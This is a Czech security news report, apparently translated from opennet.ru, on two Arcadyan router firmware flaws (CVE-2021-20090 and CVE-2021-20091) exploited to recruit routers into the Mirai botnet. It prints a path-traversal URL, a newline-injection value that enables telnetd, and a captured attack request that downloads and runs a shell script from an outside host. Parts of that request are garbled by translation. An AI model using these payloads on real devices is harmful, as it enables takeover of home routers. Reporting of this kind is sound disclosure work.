V síti byl zaznamenán masivní útok proti domácím routerům, jejichž firmware využívá implementaci HTTP serveru od společnosti Arcadyan. K získání kontroly nad zařízeními se používá kombinace dvou zranitelností, která umožňuje vzdálené spuštění libovolného kódu s právy root. Problém se týká poměrně široké škály ADSL routerů Arcadyan, ASUS a Buffalo, ale i zařízení dodávaných pod značkami Beeline (problém je potvrzen ve Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone a ostatní telekomunikační operátoři. Je třeba poznamenat, že problém je přítomen ve firmwaru Arcadyan již více než 10 let a během této doby se podařilo migrovat na nejméně 20 modelů zařízení od 17 různých výrobců.
První zranitelnost, CVE-2021-20090, umožňuje přístup k libovolnému skriptu webového rozhraní bez ověřování. Podstatou zranitelnosti je, že ve webovém rozhraní jsou některé adresáře, přes které se odesílají obrázky, CSS soubory a JavaScript skripty, přístupné bez autentizace. V tomto případě jsou adresáře, pro které je povolen přístup bez autentizace, kontrolovány pomocí počáteční masky. Zadání znaků „../“ v cestách pro přechod do nadřazeného adresáře je blokováno firmwarem, ale použití kombinace „..%2f“ je přeskočeno. Je tedy možné otevřít chráněné stránky při odesílání požadavků jako „http://192.168.1.1/images/..%2findex.htm“.
Druhá chyba zabezpečení, CVE-2021-20091, umožňuje ověřenému uživateli provádět změny v systémových nastaveních zařízení odesláním speciálně formátovaných parametrů do skriptu apply_abstract.cgi, který nekontroluje přítomnost znaku nového řádku v parametrech. . Například při provádění operace ping může útočník zadat hodnotu „192.168.1.2%0AARC_SYS_TelnetdEnable=1“ v poli s kontrolovanou IP adresou a skriptem při vytváření souboru nastavení /tmp/etc/config/ .glbcfg, zapíše do něj řádek „AARC_SYS_TelnetdEnable=1“, čímž se aktivuje server telnetd, který poskytuje neomezený přístup k příkazovému shellu s právy root. Podobně nastavením parametru AARC_SYS můžete v systému spustit libovolný kód. První zranitelnost umožňuje spustit problematický skript bez ověření tím, že k němu přistoupíte jako „/images/..%2fapply_abstract.cgi“.
Aby mohl útočník zneužít zranitelnosti, musí být schopen odeslat požadavek na síťový port, na kterém běží webové rozhraní. Soudě podle dynamiky šíření útoku mnoho operátorů ponechává na svých zařízeních přístup z externí sítě, aby zjednodušila diagnostiku problémů službou podpory. Pokud je přístup k rozhraní omezen pouze na vnitřní síť, lze útok provést z externí sítě pomocí techniky „DNS rebinding“. Chyby zabezpečení se již aktivně používají k připojení routerů k botnetu Mirai: POST /images/..%2fapply_abstract.cgi Připojení HTTP/1.1: zavřít User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Zdroj: opennet.ru